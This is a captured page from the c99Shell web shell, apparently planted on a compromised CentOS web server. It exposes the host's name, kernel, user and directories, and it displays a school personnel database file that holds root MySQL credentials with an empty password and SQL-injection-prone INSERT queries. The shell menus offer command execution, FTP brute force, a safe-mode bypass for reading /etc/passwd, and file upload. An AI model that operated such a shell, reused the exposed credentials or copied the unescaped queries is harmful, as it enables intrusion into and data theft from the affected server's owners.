!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/includes/   drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     FunctionDB2.php (2.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$ServerName "localhost";
$UserName2 "root";
$UserPassword2 "";
$DataBaseName2 "personal_developdb";

function ConnectDB2()
{
    global $con;
    global $ServerName;
    global $UserName2;
    global $UserPassword2;
    global $DataBaseName2;
    $con mysql_connect($ServerName,$UserName2,$UserPassword2);
    if (!$con)
          die("Can't Connect DataBase".mysql_error());
    mysql_select_db($DataBaseName2) or die ("Can't Select Personal_developdb ".mysql_error());
}
///////////////////////      Uses Close DB   ////////////////////////////
function CloseDB2()
{
    global $con;
    mysql_close($con);
}
/////////////////////////////////////////////////////
function  InsertCommit($Teacher_code,$Title,$Year_com,$Edu,$Edu_job,$Tsis,$Check_tool,$Scp10,$Club_bcnlp,$North_network,$Else_commit)
{
   global $conn;
   $sql "INSERT INTO committee_tb (Teacher_code,Title,Year_com,Edu,Edu_job,Tsis,Check_tool,Scp10,Club_bcnlp,North_network,Else_commit)";
   $sql $sql."VALUES ('$Teacher_code','$Title','$Year_com','$Edu','$Edu_job','$Tsis','$Check_tool','$Scp10','$Club_bcnlp','$North_network','$Else_commit')" ;
   mysql_query($sql) or die("$sql Insert has incorrect".mysql_error());
}
/////////////////////////////////////////////////////
function  InsertEdu_Service($Project_name,$Period,$Date_start,$Term,$Year_budget,$Budget,$Budget_use,$Target_group,$Objective,$Fund_support ,$Fee,$Response,$Total_time_project ,$Total_time_insi ,$Total_time_inso)
{
   global $conn;
   $sql "INSERT INTO edu_service_tb (Project_name,Period,Date_start,Term,Year_budget,Budget,Budget_use,Target_group,Objective,Fund_support ,Fee,Response,Total_time_project ,Total_time_insi ,Total_time_inso)";
   $sql $sql."VALUES ('$Project_name','$Period','$Date_start','$Term','$Year_budget','$Budget','$Budget_use','$Target_group','$Objective','$Fund_support' ,'$Fee','$Response','$Total_time_project','$Total_time_insi' ,'$Total_time_inso')" ;
   mysql_query($sql) or die("$sql Insert has incorrect".mysql_error());
}
///////////////////////////////////////////////////
function  Insert_Res_project($Teacher_code,$Project_name,$Year_res,$Duty,$Duty_else,$Apply)
{
   global $conn;
   $sql "INSERT INTO res_project_tb (Teacher_code,Project_name,Year_res,Duty,Duty_else,Apply)";
   $sql $sql."VALUES ('$Teacher_code','$Project_name','$Year_res','$Duty','$Duty_else','$Apply')" ;
   mysql_query($sql) or die("$sql Insert has incorrect".mysql_error());
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0139 ]--